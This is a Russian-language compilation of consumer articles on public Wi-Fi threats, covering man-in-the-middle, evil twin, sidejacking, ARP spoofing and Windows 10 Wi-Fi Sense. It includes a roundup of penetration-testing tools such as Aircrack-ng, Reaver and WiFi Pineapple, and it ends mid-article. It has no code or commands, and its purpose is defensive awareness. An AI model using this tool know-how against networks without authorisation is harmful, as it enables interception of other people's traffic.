Получив представление об этих решениях для взлома беспроводных сетей, вы станете лучшим экспертом в области беспроводной безопасности, экспертом по кибербезопасности или профессионалом в области сетевой безопасности. Это поможет вам правильно настроить ваши сети Wi-Fi и не попасть в ловушку аналогичных угроз сетевой безопасности.

Теперь у вас достаточно знаний о программном обеспечении для взлома Wi-Fi, чтобы начать свой путь к тому, чтобы стать взломщиком беспроводных паролей. Наконец, мы настоятельно рекомендуем использовать инструменты для взлома Wi-Fi в учебных целях. Помните, что взлом беспроводных сетей с целью получения несанкционированного доступа является киберпреступлением.

Хотите защитить себя от взлома беспроводной сети? Рассмотрите возможность получения сертификата CISSP уже сегодня.

5 способов, которыми хакеры используют общедоступный Wi-Fi для кражи вашей личности

Мы все использовали общедоступный Wi-Fi: он бесплатный, экономит ваши данные и всегда помогает ускорить загрузку.

Возможно, вы любите общедоступный Wi-Fi, но и хакеры тоже.

Вот лишь несколько способов, которыми киберпреступники могут взломать устройства в общедоступной сети Wi-Fi, получить доступ к вашим личным данным и потенциально украсть вашу личность. И как защитить себя от взлома публичного Wi-Fi.

1. Атаки «Человек посередине»

Атака «Человек посередине» (MITM) — это кибератака, при которой третья сторона перехватывает сообщения между двумя участниками.Вместо того, чтобы делиться данными напрямую между сервером и клиентом, эта связь разрывается другим элементом.

Незваный угонщик может затем представить свою версию сайта для отображения вам, добавив свои сообщения.

Любой, кто пользуется общедоступным Wi-Fi, особенно уязвим для атак MITM. Поскольку передаваемая информация обычно не зашифрована, общедоступна не только точка доступа; это тоже ваши данные.

Скомпрометированный маршрутизатор может относительно просто очистить много личных материалов: например, хакеры, попадая в вашу электронную почту, дают им доступ к вашим логинам, паролям, личным сообщениям и многому другому!

Как защитить себя от атак MITM

Общедоступный Wi-Fi может не быть зашифрован, но большинство крупных сайтов, запрашивающих пароль, таких как PayPal, eBay и Amazon, используют свои собственные методы шифрования.Проверьте это, просмотрев URL-адрес. Если это HTTPS-адрес (дополнительная буква «S», означающая «Безопасный»), существует некоторый уровень шифрования.

Не вводите никаких данных, если вы видите уведомление о том, что сайт может быть поддельным, даже если вы в отчаянии. Большинство браузеров выдадут вам предупреждающее сообщение, если вы посетите незащищенный сайт.

2. Поддельное подключение к Wi-Fi

Этот вариант атаки MITM также известен как «Злой Двойник».Этот метод перехватывает ваши данные при передаче, но обходит любые системы безопасности, которые могут быть у общедоступной точки доступа Wi-Fi.

Жертвы могли передавать всю свою личную информацию просто потому, что их обманом заставили присоединиться не к той сети.

Установить поддельную точку доступа (AP) довольно просто, и киберпреступники окупятся.

Они могут использовать любое устройство с выходом в Интернет, включая смартфон, для настройки точки доступа с тем же именем, что и настоящая точка доступа.Любые передаваемые данные, отправленные после присоединения к фальшивой сети, проходят через хакера.

Как защититься от взлома злых близнецов

Есть несколько советов, которые следует помнить о том, как обнаружить общедоступный Wi-Fi «злого близнеца». Будьте подозрительны, если увидите два сетевых соединения с одинаковыми названиями. Если они связаны с магазином или закусочной, поговорите с тамошним персоналом.

Если вы на работе обнаружили поддельную точку доступа, сообщите об этом.

Вам также следует рассмотреть возможность использования виртуальной частной сети со скремблированием данных (VPN).Это устанавливает уровень шифрования между конечным пользователем и веб-сайтом, поэтому потенциально перехваченные данные не могут быть прочитаны хакером без правильного ключа дешифрования.

3. Анализ пакетов

Это забавное название, но реальная практика «сниффинга пакетов» далеко не до смеха. Этот метод позволяет хакеру получать информацию из воздуха, а затем анализировать ее со своей скоростью.

Устройство передает пакет данных по незашифрованной сети, который затем может быть прочитан бесплатным программным обеспечением, таким как Wireshark.Правильно: это бесплатно.

Посмотрите в Интернете, и вы даже увидите руководства, которые научат вас использовать Wireshark. Его можно использовать для анализа веб-трафика, в том числе (по иронии судьбы) для поиска угроз безопасности и уязвимостей, требующих исправления.

Связанные: что такое анализ пакетов и как остановить атаки сниффинга?

Анализ пакетов относительно прост и в некоторых случаях даже не является незаконным. ИТ-отделы делают это регулярно, обеспечивая соблюдение безопасных методов работы, обнаружение неисправностей и соблюдение политик компании.Но это также полезно для киберпреступников.

Хакеры могут получить множество данных, а затем просканировать их на досуге в поисках важной информации, например паролей.

Как защититься от перехвата пакетов

Вам нужно полагаться на надежное шифрование, поэтому инвестируйте в VPN и убедитесь, что сайты, требующие частной информации, имеют сертификаты SSL / TSL (т.е. ищите HTTPS).

4. Sidejacking (перехват сеанса)

Sidejacking основан на получении информации посредством сниффинга пакетов.Однако вместо того, чтобы использовать эти данные задним числом, хакер использует их на месте в режиме реального времени. Хуже того, он обходит некоторые степени шифрования!

Данные для входа обычно отправляются через зашифрованную сеть и проверяются с использованием информации учетной записи, хранящейся на веб-сайте. Затем он отвечает, используя файлы cookie, отправленные на ваше устройство. Но последний не всегда зашифрован — хакер может захватить ваш сеанс и получить доступ к любым личным учетным записям, в которые вы вошли.

Хотя киберпреступники не могут прочитать ваш пароль с помощью sidejacking, они могут загрузить вредоносное ПО для получения таких данных, даже включая Skype.

Кроме того, они могут получить много информации, чтобы украсть вашу личность. Огромный объем данных можно получить только на основании вашего присутствия в социальных сетях.

Общедоступные точки доступа особенно привлекательны для этого взлома, потому что обычно высокий процент пользователей имеет открытые сеансы.

Как защититься от перехвата сеанса

Стандартные методы шифрования борются с сайдджекингом, поэтому VPN будет шифровать информацию на ваше устройство и с него.

В качестве дополнительной меры безопасности убедитесь, что вы всегда выходите из системы, когда покидаете точку доступа, иначе вы рискуете позволить хакеру продолжать использовать ваш сеанс. С сайтами социальных сетей вы можете по крайней мере проверить места, где вы вошли в систему, а затем выйти из системы удаленно.

Связано: как удаленно выйти из учетных записей социальных сетей

5. Серфинг через плечо

Изображение предоставлено: Richard / Flickr

. Это может показаться очевидным, но мы часто забываем о таких простых мерах безопасности.

Каждый раз, когда вы пользуетесь банкоматом, вы должны проверять окружающих, чтобы никто не подглядывал, когда вы вводите свой PIN-код.

Это также опасность, когда дело доходит до общедоступного Wi-Fi. Если кто-то витает вокруг, когда вы посещаете частные сайты, будьте подозрительны. Не отправляйте ничего личного, например пароль. Это очень простая афера, но она определенно работает для хакеров и хакеров.

Связанные: Самые известные и лучшие хакеры в мире (и их увлекательные истории)

«Серфингисту по плечу», возможно, даже не нужно быть позади вас: простое наблюдение за тем, что вы печатаете, может дать преступникам возможность работать.

Как защититься от серферов на плече

Будьте бдительны. Знай, кто тебя окружает. Иногда помогает паранойя. Если вы не уверены в окружающих, не делайте ничего личного.

Не стоит недооценивать важность того, что вы заполняете или читаете: например, медицинская информация может быть полезна для похитителей личных данных. Если это документ или веб-страница, которые вы не хотите, чтобы другие видели, примите меры, чтобы этого не произошло.

Другой вариант — приобрести экран конфиденциальности; они ограничивают то, что люди видят на вашем экране.

Как VPN могут защитить от взлома общедоступных Wi-Fi?

Основная проблема общедоступного Wi-Fi — отсутствие шифрования. VPN шифруют вашу личную информацию, поэтому без правильного ключа дешифрования ее невозможно прочитать (во всяком случае, в большинстве случаев). Если вы регулярно пользуетесь точками доступа, вам понадобится VPN.

К счастью, вы можете найти совершенно бесплатные VPN как для ноутбуков, так и для таких устройств, как смартфоны.Но вы должны оставаться непредубежденными и подумать о том, чтобы заплатить и за него; стоит сохранить вашу личную информацию.

Подавляющее большинство из нас использует общедоступный Wi-Fi, но нам нужно быть осторожнее с этим.

7 безопасных стратегий безопасного использования общедоступных сетей Wi-Fi на телефонах

Это общедоступная сеть Wi-Fi, к которой вы только что подключились, безопасно? Прежде чем пить латте и читать Facebook, рассмотрите эти простые стратегии безопасного использования общедоступного Wi-Fi на своем телефоне.

Читать далее

Об авторе Филип Бейтс (Опубликовано 277 статей)

Когда он не смотрит телевизор, не читает книги и комиксы Marvel, не слушает The Killers и не зацикливается на идеях сценария, Филип Бейтс притворяется писателем-фрилансером.Ему нравится все собирать.

Более От Филипа Бейтса
Подпишитесь на нашу рассылку новостей

Подпишитесь на нашу рассылку, чтобы получать технические советы, обзоры, бесплатные электронные книги и эксклюзивные предложения!

Нажмите здесь, чтобы подписаться

Фактическая угроза безопасности, о которой необходимо знать

Всего через день после того, как Microsoft выпустила свою новую операционную систему, более 14 миллионов пользователей Windows обновили свои ПК до Windows 10 .

Конечно, если вы один из миллионов, вам следует знать о функции Wi-Fi Sense в Windows 10, которая позволяет вашим друзьям автоматически подключаться к вашей беспроводной сети без предоставления пароля Wi-Fi.

Пахнет ужасной угрозой безопасности! Это даже вызвало бурю среди некоторых экспертов по безопасности, которые предупредили, что Wi-Fi Sense — ужасная и опасная функция и что вы должны немедленно отключить ее.

Даже некоторые исследователи посоветовали пользователям Windows 10 переименовать свои точки доступа Wi-Fi.

Прежде чем обсуждать риски Wi-Fi Sense, давайте сначала узнаем, как это работает.

Как работает Windows 10 Wi-Fi Sense?

Функция Windows 10 Wi-Fi Sense позволяет вам делиться своим паролем Wi-Fi с друзьями или контактами, а также позволяет автоматически подключаться к сетям, к которым ваши друзья и знакомые подключались в прошлом, даже если вы не знаете пароль.


Теперь, когда эти друзья находятся в зоне действия вашей сети Wi-Fi, Windows 10 автоматически подключается к сети с сохраненным паролем, которым вы только что поделились с друзьями, и выполняет их вход, не запрашивая у них пароль.

Включено по умолчанию, но это не настоящая угроза безопасности. Вот почему:

Функция Wi-Fi Sense включена по умолчанию в Windows 10, чтобы пользователям было проще получать мгновенный доступ к общим сетям их друзей или контактов.

Но, но, но… Вы заметили, что функция говорит: « Для сетей я выбираю … »?

« Включено по умолчанию » не означает, что ваши пароли Wi-Fi будут автоматически передаваться вашим контактам Facebook или Skype по умолчанию, если только вы не настроите вручную настройки Wi-Fi Sense для предоставления доступа к выбранной сети с любая контактная группа.

В разделе «Для сетей я выбираю …» вы можете явно указать, какая группа контактов из каких социальных сетей получает доступ к какой сети Wi-Fi.

До тех пор, пока вы не предложите свой пароль Wi-Fi для Wi-Fi Sense, он не позволит выбранной группе контактов подключиться к вашей сети.

Это означает, что опция совместного использования пароля Wi-Fi по умолчанию отключена для всех социальных сетей.

И, конечно, даже если вы решите поделиться своей сетью Wi-Fi со своими контактами, Wi-Fi Sense предоставляет доступ только к Интернету, а не к вашему фактическому паролю Wi-Fi.

Почему следует опасаться обнаружения Wi-Fi (фактическая угроза безопасности)

Microsoft продвигала Wi-Fi как:

Проще говоря, теперь вам не нужно зачитывать вслух свой пароль Wi-Fi, символ за символом, когда ваши друзья находятся у вас дома и хотят использовать Интернет. Точно так же вам не нужно кричать в офисе или в доме друга: «Какой пароль от Wi-Fi?»

Однако:

«Если вы решите поделиться со своими друзьями из Facebook, любой из ваших друзей из Facebook, которые используют Wi-Fi Sense на Windows Phone, сможет подключиться к сети, которой вы поделились, когда она находится в зоне действия. Вы не можете выбрать и выберите отдельные контакты.« — Microsoft FAQ говорит.

Как обычный пользователь Интернета, я принимал почти все запросы на добавление в друзья в Facebook, а также общался со многими людьми в Skype или Outlook. Короче говоря, большинство людей в моем списке контактов — это те, кого я не знаю лично или которым я не доверяю.

Итак, если я не могу выбрать какой-либо отдельный контакт из своего списка, то при включении «Функция обмена сетевым паролем» предоставит доступ к моей сети всем моим контактам в выбранной социальной сети.

Microsoft также утверждает:

Также он не позволяет кому-либо получить доступ к вашим локальным ресурсам, чтобы никто не мог искать ваши личные файлы.

Однако мы знаем, что …

Самая большая угроза совместного использования вашего доступа к Wi-Fi со всеми в списке — это то же самое, что вы позволяете хакерам находиться между вами и точкой подключения, то есть Атака Man-in-the-Middle .

В таких сценариях атаки хакер может получить доступ ко всей информации, которую вы отправляете в Интернете, включая важные электронные письма, пароли учетных записей или данные кредитной карты.

Находясь в той же сети, злоумышленник также может атаковать вашу машину напрямую с помощью Metasploit или любого другого хакерского инструмента.

В конечном счете, Windows 10 Wi-Fi Sense, вероятно, не самая безопасная функция в мире, но это тоже не так уж и плохо, если в будущем Microsoft сможет разрешить пользователям Windows 10 выбирать отдельные контакты из группы.

А сейчас… стоит ли вам прекратить его использовать?

Как и многие другие вещи в жизни, мы должны делать выбор между вещами, которые делают нашу жизнь комфортной, и тем, что обеспечивает нам абсолютную безопасность.

И, если вас больше беспокоит безопасность, просто выключите Wi-Fi Sense.

Как выключить Windows 10 Wi-Fi Sense?

Чтобы отключить Wi-Fi Sense, перейдите в «Настройки Windows», затем «Сеть и Интернет», затем нажмите «Изменить настройки Wi-Fi», а затем « Управление настройками Wi-Fi ».

Оттуда вы можете изменить множество настроек. ВЫКЛЮЧИТЕ все, что находится под заголовком Wi-Fi Sense; отключить обмен паролями WI-Fi с Facebook, Outlook или Skype; и заставьте Wi-Fi Sense забыть список известных сетей Wi-Fi.

Как взломать собственную сеть Wi-Fi

Один из способов укрепить ваше понимание безопасности Wi-Fi — это взломать себя. Это не значит, что вы должны проникать в сеть компании или следить за настройками соседа. Скорее, этический взлом и законное тестирование проникновения Wi-Fi, проводимое в сотрудничестве с владельцем сети, может помочь вам узнать больше о сильных сторонах и ограничениях беспроводной безопасности. Понимание потенциальных уязвимостей Wi-Fi может помочь вам лучше защитить сети, которыми вы управляете, и обеспечить более безопасные соединения при доступе к другим беспроводным сетям.

Начни с Wi-Fi спотом

Универсальные переключатели Wi-Fi — это самый простой инструмент, который можно добавить в комплект для проверки пера. Хотя обычно это пассивные инструменты, они служат важной цели. Они позволяют вам видеть ближайшие точки доступа (AP) и их детали, такие как уровень сигнала, тип безопасности / шифрования и адрес управления доступом к среде (MAC).

Используя спамблер, вы можете найти сети, использующие слабые протоколы безопасности, такие как WEP или исходная версия WPA.Или, если пройтись по собственности с запнувшимся, можно выявить несанкционированные точки доступа, установленные сотрудниками или другими лицами, которые могут открыть вашу сеть для атаки. Даже если есть точки доступа со скрытыми или не транслируемыми идентификаторами набора услуг (SSID), некоторые «спотыкающиеся» могут быстро их раскрыть.

Одним из примеров «спотыкающегося» является Vistumbler, приложение для Windows с открытым исходным кодом, которое отображает основные сведения о точках доступа, включая точные методы аутентификации и шифрования, а также может отображать SSID и уровень сигнала.Он также отображает графики уровней сигналов и использования каналов. Он обладает широкими возможностями настройки и предлагает гибкие параметры конфигурации. Vistumbler поддерживает имена точек доступа, чтобы помочь их различать, что также помогает обнаруживать несанкционированные точки доступа. Он поддерживает ведение журнала GPS и отслеживание в реальном времени в приложении с помощью Google Планета Земля.

Если вы не хотите таскать с собой ноутбук и иметь мобильное устройство, рассмотрите возможность использования AirPort-Утилиты на устройстве iOS или загрузите приложение на Android.

Одним из мобильных вариантов является Wifi Analyzer, бесплатное приложение для Android, которое можно использовать для поиска точек доступа на смартфоне или планшете на базе Android. В нем перечислены основные сведения о точках доступа в диапазоне 2,4 ГГц, а также о поддерживаемых устройствах в диапазоне 5 ГГц.

Вы можете экспортировать список точек доступа (в формате XML), отправив его по электронной почте или в другое приложение, или сделав снимок экранов. Он также имеет графики, показывающие сигналы по каналам, истории и рейтингу использования, и имеет функцию измерителя сигнала, которая помогает находить точки доступа.(Если бесплатное приложение для проблем не помогает, ознакомьтесь с нашим обзором более надежных коммерческих вариантов)

Снифферы Wi-Fi и мониторы воздушной волны

Снифферы Wi-Fi

идут дальше, чем спотыкающиеся. Вместо того, чтобы просто собирать сведения о сети, снифферы захватывают, показывают и / или анализируют необработанные пакеты, отправленные по радиоволнам. Захваченный трафик можно импортировать в другие инструменты, такие как взломщик шифрования. Некоторые снифферы также включают функции для анализа или взлома.Кроме того, некоторые снифферы ищут и сообщают только об определенном сетевом трафике, например, те, которые предназначены для обнаружения паролей, отправленных в виде открытого текста.

CommView for WiFi — популярный коммерческий сниффер и анализатор Wi-Fi, для которого предлагается 30-дневная ограниченная пробная версия. В нем есть функция спотыкания, позволяющая отображать сведения о сети, а также статистику использования каналов и графики. Он может отслеживать IP-соединения и записывать любые сеансы VoIP. Инструмент также позволяет захватывать и просматривать необработанные пакеты.

Если вы подключены к сети Wi-Fi, вы можете ввести парольную фразу PSK, чтобы отображались расшифрованные пакеты.Вы также можете установить правила для фильтрации данных, которые вы видите, и установить будильники для отслеживания несанкционированных устройств. Другие интересные функции включают генератор трафика для спуфинга; повторное связывание узла для ручного запуска клиентов; и реконструкция TCP для лучшего просмотра захваченных данных (текста или фотографий).

Kismet — это система обнаружения Wi-Fi, анализатора пакетов и обнаружения вторжений с открытым исходным кодом, которая может работать в Windows (со структурой WSL), Mac OS X, Linux и BSD. Он показывает детали точки доступа, включая SSID «скрытых» сетей.Он также может захватывать необработанные беспроводные пакеты, которые затем можно импортировать в Wireshark, TCPdump и другие инструменты. В Windows Kismet работает только с беспроводными адаптерами CACE AirPcap из-за ограничений драйверов Windows. Однако он поддерживает множество беспроводных адаптеров в Mac OS X и Linux.

Инструменты

раскрывают детали Wi-Fi

WirelessKeyView от NirSoft — это простой, но изящный инструмент, в котором перечислены все ключи или парольные фразы WEP, WPA и WPA2, хранящиеся на компьютере Windows, на котором он запущен.

Хотя в Windows 7 и предыдущих версиях было довольно легко открыть сохраненные ключи через обычный графический интерфейс Windows, Microsoft усложнила это в Windows 10. WirelessKeyView быстро предоставит вам экспортируемый список всех сохраненных сетей независимо от версии ОС.

Инструменты

, такие как WirelessKeyView, могут выявить, как взломанное или украденное устройство может содержать конфиденциальную информацию помимо документов. Это также показывает важность использования аутентификации 802.1x, когда пользователи будут иметь индивидуальные учетные данные для входа в сеть Wi-Fi и не подвержены этому типу проблем.

Aircrack-ng — это набор инструментов с открытым исходным кодом для взлома ключей WEP и WPA / WPA2-Personal.

Работает в Windows, Mac OS X, Linux и OpenBSD. Его также можно загрузить в виде образа VMware и Live CD. Вы можете просматривать ближайшие сети Wi-Fi, включая скрытые или не транслируемые SSID. Вы также можете захватывать необработанные пакеты, вводить и воспроизводить трафик и, возможно, взламывать ключи шифрования, как только будет захвачено достаточное количество пакетов.

Дистрибутив Linux для этического взлома и тестирования на проникновение

Один из самых популярных дистрибутивов для тестирования пера — Kali Linux.В дополнение к стандартной установке ОС Linux на компьютер вы можете создать загрузочный диск или загрузить образы VMware или VirtualBox. Он содержит огромный список инструментов безопасности и криминалистики, некоторые из которых вы можете использовать для тестирования Wi-Fi на проникновение. Например, включены инструменты Kismet и Aircrack-ng.

Некоторые из других инструментов Wi-Fi, включенных в Kali Linux, — это Reaver для взлома сети с помощью незащищенного PIN-кода WPS, FreeRadius-WPE для выполнения атак типа «злоумышленник в середине» на 802.1X и Wifi Honey, чтобы создать горшок с медом, чтобы заманить клиентов подключиться к поддельной точке доступа в надежде перехватить их трафик и выполнить атаки типа «злоумышленник в середине».

Сделайте все возможное с помощью аппаратного инструмента

Если вы действительно серьезно относитесь к безопасности беспроводной сети и играете с ее уязвимостями, вам нужно попробовать WiFi Pineapple. Это аппаратное решение, специально разработанное для аудита Wi-Fi и тестирования на проникновение. Вы можете сканировать, нацеливать, перехватывать и сообщать о многих беспроводных угрозах и слабых местах.

WiFi Pineapple выглядит как маршрутизатор, включая веб-интерфейс.

Вы можете делать такие вещи, как просмотр сведений о клиенте для каждой точки доступа, отправлять пакеты деаутентификации и автоматически создавать поддельные точки доступа, имитируя ближайшие SSID, для некоторого развлечения. Вы также можете захватывать данные о просмотре веб-страниц другими пользователями и подделывать ответы DNS, чтобы запутать пользователей или отправить их на поддельные сайты.

WiFi Pineapple в настоящее время предлагает два варианта оборудования: карманный однодиапазонный NANO по цене от 99 долларов.99 и двухдиапазонный маршрутизатор TETRA (см. Полный обзор) по цене от 199,99 долларов.

См. Полный список статей здесь

Как происходят взломы WiFi (обновлено) — Private WiFi

Представьте себе эти сценарии:

  1. Вы в отпуске и открываете ноутбук в номере отеля. Вы входите в общедоступную сеть Wi-Fi, быстро соглашаетесь с Положениями и условиями (конечно, не читая их) и начинаете выполнять свои обычные действия в Интернете.Всего на секунду у вас мимолетная мысль: «Мой компьютер в опасности?» А затем вы начинаете свою обычную деятельность в Интернете и быстро забываете об этом.
  2. Вы ждете своего рейса в аэропорту и, взяв чашку кофе и открыв ноутбук, вы видите, что доступна сеть «Бесплатный общественный Wi-Fi». Вы входите в свой банковский счет для перевода средств. У вас есть смутное ощущение, что вы, возможно, делаете что-то небезопасное, но вы полагаете, что будете в сети всего пятнадцать минут, так что с вами, вероятно, все в порядке, верно?

Насколько безопасны точки доступа Wi-Fi?

Многие из нас предполагают, что использование сети Wi-Fi в отеле или аэропорту — это то же самое, что вход в нашу сеть дома или в офисе.Но риски использования сетей Wi-Fi в отеле или аэропорту экспоненциально выше, чем риски дома или на предприятии.

Например, хотя совместное использование папок, принтеров, рабочих столов и других служб может быть полезно дома или в офисе, делать это неуместно в общедоступной сети, где конкуренты или хакеры могут получить доступ к этой информации.

Большинство частных сетей используют брандмауэры для защиты пользователей от интернет-атак. Это не обязательно верно в общедоступных беспроводных сетях, где методы обеспечения безопасности сильно различаются.Вы можете считать, что защищены от атак извне, но на самом деле понятия не имеете, есть ли брандмауэр между данными вашего портативного компьютера и Интернетом.

Деловые путешественники, желающие подключиться к любой сети, предлагающей бесплатный доступ в Интернет, особенно уязвимы для таких атак. Отличить безопасные сети от плохих буквально невозможно. Беспроводное прослушивание возможно везде. Лишь небольшой процент общедоступных сетей предотвращает беспроводное прослушивание, и во многих сетях пользователи Wi-Fi полностью несут ответственность за безопасность своих портативных компьютеров с обширным или полным раскрытием файлов и сервисов.

Так о чем мне беспокоиться?

Хорошо, теперь вы, вероятно, знаете, что использование общедоступной сети Wi-Fi в дороге подвергает вас множеству рисков для безопасности. Но о каких именно рисках мы говорим?

Ниже приводится список различных типов взломов, которые могут происходить в общедоступных точках доступа Wi-Fi:

  • Анализаторы: Программные анализаторы позволяют перехватчикам пассивно перехватывать данные, передаваемые между вашим веб-браузером и веб-серверами в Интернете.Это самый простой и самый простой вид атаки. Любая электронная почта, поиск в Интернете или файл, который вы передаете между компьютерами или открываете из сетевых папок в незащищенной сети, могут быть захвачены хакерами. Программное обеспечение для сниффинга доступно бесплатно в Интернете, а на YouTube есть 184 видеоролика, в которых начинающим хакерам рассказывается, как ими пользоваться. Единственный способ защитить себя от перехвата WiFi в большинстве общедоступных точек доступа WiFi — это использовать VPN, например PRIVATE WiFi ™.
  • Sidejacking: Sidejacking — это метод, при котором злоумышленник использует анализ пакетов для кражи файла cookie сеанса с веб-сайта, который вы только что посетили.Эти файлы cookie часто содержат имена пользователей и пароли и обычно отправляются вам в незашифрованном виде, даже если исходный вход в систему был защищен через HTTPS. Любой, кто слушает, может украсть эту информацию для входа в систему, а затем использовать ее для взлома вашей учетной записи Facebook или Gmail. Это стало новостью в конце 2010 года, потому что программист выпустил программу под названием Firesheep, которая позволяет злоумышленникам, сидящим рядом с вами в общедоступной сети Wi-Fi, захватить ваш сеанс Facebook, получить доступ ко всем вашим конфиденциальным данным и отправить вирусные сообщения и сообщения на стене всем пользователям. твои друзья.
  • Evil Twin / Honeypot Attack: Это мошенническая точка доступа Wi-Fi, которая выглядит законной, но на самом деле была создана хакером для прослушивания беспроводной связи. Злой двойник — это беспроводная версия «фишинга»: злоумышленник обманом заставляет пользователей беспроводной сети подключить ноутбук или мобильный телефон к зараженной точке доступа, выдавая себя за законного провайдера. Когда жертва подключается, хакер может запускать атаки типа «злоумышленник в середине», прослушивая весь Интернет-трафик, или просто запрашивать информацию о кредитной карте в рамках стандартной сделки с оплатой за доступ.Инструменты для настройки легко доступны (например, Karma и Hotspotter). Одно недавнее исследование показало, что более 56% ноутбуков транслировали названия своих доверенных сетей Wi-Fi, и что 34% из них были готовы подключиться к крайне небезопасным сетям Wi-Fi.
  • ARP Spoofing: Спуфинг протокола разрешения адресов (ARP), также известный как ARP-лавинная рассылка, ARP-отравление или ARP Poison Routing (APR), представляет собой метод, используемый для атаки на беспроводную сеть. Подмена ARP позволяет злоумышленнику перехватить трафик в локальной сети и полностью изменить или остановить трафик.Эта атака может происходить только в сетях, которые используют ARP, а не другой метод разрешения адресов. Подмена ARP отправляет поддельные или «спуфинговые» сообщения ARP в локальную сеть, которая связывает MAC-адрес злоумышленника с IP-адресом жертвы. Вместо этого злоумышленнику по ошибке отправляется любой трафик, предназначенный для IP-адреса жертвы. Затем злоумышленник может перенаправить трафик на фактический шлюз по умолчанию (пассивное прослушивание) или изменить данные перед их пересылкой (атака «человек посередине»). Злоумышленник также может запустить атаку отказа в обслуживании против жертвы, связав несуществующий MAC-адрес с IP-адресом жертвы.Успешная попытка APR невидима для пользователя.
  • Незаконные сети «Бесплатный общедоступный Wi-Fi»: Сети «Бесплатный общедоступный Wi-Fi» — это специальные сети, рекламирующие «бесплатное» подключение к Интернету. После подключения к вирусной сети все ваши общие папки становятся доступными для любого другого ноутбука, подключенного к сети. После этого хакер может легко получить доступ к конфиденциальным данным на вашем жестком диске. Эти вирусные сети могут быть использованы злым близнецом в качестве приманки. Сети «Free Public WiFi» появляются во многих аэропортах.Не подключайтесь к этим сетям, и вы не заразите свой ноутбук. Если вы обнаружите такую ​​сеть на своем ноутбуке, удалите ее и перенастройте адаптер, чтобы избежать автоматического подключения к любой беспроводной сети.
  • Атаки «злоумышленник посередине»: Любое устройство, которое находится между вами и сервером, может выполнять атаки «злоумышленник посередине», которые перехватывают и изменяют данные, которыми обмениваются две системы. Вам человек посередине кажется легитимным сервером, а серверу человек посередине — законным клиентом.В беспроводной локальной сети эти атаки могут быть запущены Злым Двойником.

Вы должны знать, с чем соглашаетесь

Помните те Положения и условия, с которыми вы согласились, но не прочитали? Что ж, мы действительно их читали, и вот что некоторые из них говорят:

  • Starbucks: Заказчик несет ответственность за обеспечение безопасности своей сети и компьютеров, которые подключаются к IP-сервисам и используют их.
  • Boingo Wireless: Существуют риски безопасности, конфиденциальности и конфиденциальности, присущие беспроводной связи и технологиям, и Boingo не дает никаких заверений или гарантий в отношении таких рисков.Если у вас есть опасения, вам не следует использовать программное обеспечение или сервис Boingo. Мы не можем гарантировать, что использование вами беспроводных услуг через Boingo, включая контент или сообщения к вам или от вас, не будут просмотрены неавторизованными третьими сторонами.
  • JetBlue: Беспроводные интернет-соединения, например, предоставляемые через Сервис, небезопасны. Связь может быть перехвачена другими людьми, и ваше оборудование может стать объектом наблюдения и / или быть поврежденным. Поскольку беспроводное соединение, обеспечивающее вам доступ, использует радиосигналы, вы не должны рассчитывать на конфиденциальность вообще при использовании услуги.Соответственно, при предоставлении этой услуги JetBlue не может и не обещает никакой защиты конфиденциальности при использовании вами этой услуги. Вы несете исключительную ответственность за установку и развертывание технологических инструментов для защиты ваших коммуникаций и оборудования, которые могут быть скомпрометированы при использовании беспроводной сети ».

Дополнительные примеры Положений и условий от поставщиков точек доступа см. В разделе «Прочтите мелкий шрифт» на нашем веб-сайте.

Итак, как я могу защитить свой ноутбук?

Итак, теперь вы знаете, насколько опасными могут быть беспроводные сети и с какими видами атак вы можете столкнуться при их использовании.Итак, что конкретно вы можете сделать, чтобы защитить себя и свои данные?

Ниже приведены некоторые превентивные меры, которые вы можете предпринять, чтобы защитить себя при использовании таких сетей, и службы, которые можно использовать для обеспечения безопасности портативных компьютеров.

  • Отключить или заблокировать общий доступ к файлам
  • Включите брандмауэр Windows или установите сторонний персональный брандмауэр
  • Использовать шифрование файлов
  • Самое главное, используйте VPN

Единственное, что их всех объединяет, — это то, что вы обязаны защитить себя.Лучший способ защитить вашу конфиденциальную информацию — использовать виртуальную частную сеть или VPN, которая шифрует данные, передаваемые на ваш портативный компьютер и с него. Шифрование защищает все ваше интернет-общение от перехвата посторонними в точках доступа Wi-Fi. Кроме того, VPN могут помешать хакерам подключиться к вашему ноутбуку и украсть ваши файлы данных.

У большинства крупных компаний есть корпоративная поддержка VPN для защиты корпоративных коммуникаций. PRIVATE WiFi предоставляет те же возможности для частных лиц, деловых путешественников, а также для малых и средних предприятий.Пожалуйста, посетите наш веб-сайт для получения подробной информации.

Как не стать следующей жертвой

Для вас естественно использовать общедоступный Wi-Fi, если он доступен, когда вас нет дома. Во многих кафе, ресторанах, аэропортах и ​​торговых центрах везде есть точки доступа к общедоступным сетям Wi-Fi. Вот почему часто возникает соблазн проверить свою электронную почту, оплатить подписку и сделать покупки в Интернете, потягивая горячий шоколад. Но проблема в том, что через эти точки доступа вы можете потерять конфиденциальную информацию для киберпреступников.Учитывая широкое распространение беспроводной связи, она стала пристанищем для хакеров и киберпреступников. Они нацелены на пользователей Интернета, которые не слишком заинтересованы в защите своей конфиденциальности разными способами. Одна из таких тактик, которая, кажется, всегда работает для этих преступников, — это то, что мы называем «атакой злых близнецов».

В этой статье будет рассмотрено, что это за атака, как ее идентифицировать и как защитить себя от нее. Итак, продолжайте читать!

Что такое атака злого близнеца?

Злой близнец — мошенник или сомнительный клон законной точки беспроводного доступа, предназначенный для обмана людей.Хакеры создают эту точку доступа Wi-Fi, чтобы она выглядела в точности как настоящая, и обманом заставляют пользователей подключаться к Интернету через нее. Как только кто-либо подключится к сети, преступники будут подслушивать его действия и красть все их данные в незаконных целях.

Интернет-пользователей часто становятся жертвами тактики злых близнецов, потому что точки доступа обычно кажутся законными. Преступники, стоящие за фальшивой точкой доступа, клонируют MAC-адрес и SSID (идентификатор набора услуг) законной сети, чтобы запутать как пользователей, так и их устройства.

Вот почему пользователи, которые ничего не знают о конфигурациях Wi-Fi, будут подключаться к злому близнецу как к настоящей точке доступа. После использования клона хакеры будут перехватывать трафик, проходящий между ними и хостом. Вот почему многие люди стали жертвами финансового мошенничества, кражи личных данных и других кибератак. Преступники используют злого близнеца для кражи пользовательских данных для многих сомнительных и преступных действий.

Атаки

Evil twin во многих случаях успешны, потому что большинство пользователей не понимают обновления и настройки WIFI.Другая причина заключается в том, что большинство устройств не могут различить две сети с одинаковыми именами.

Все, что они знают, — это SSID, и у хакеров обычно есть полевой рабочий день, манипулируя им, чтобы запутать ваши устройства. Более того, большинство сетей, предоставляющих общедоступный Wi-Fi, обычно имеют множество точек доступа с одним именем. Таким образом, переключение с одной точки доступа на другую часто сбивает пользователей с толку, но позволяет злоумышленникам также добавлять свои клоны.

Как работают атаки злых близнецов?

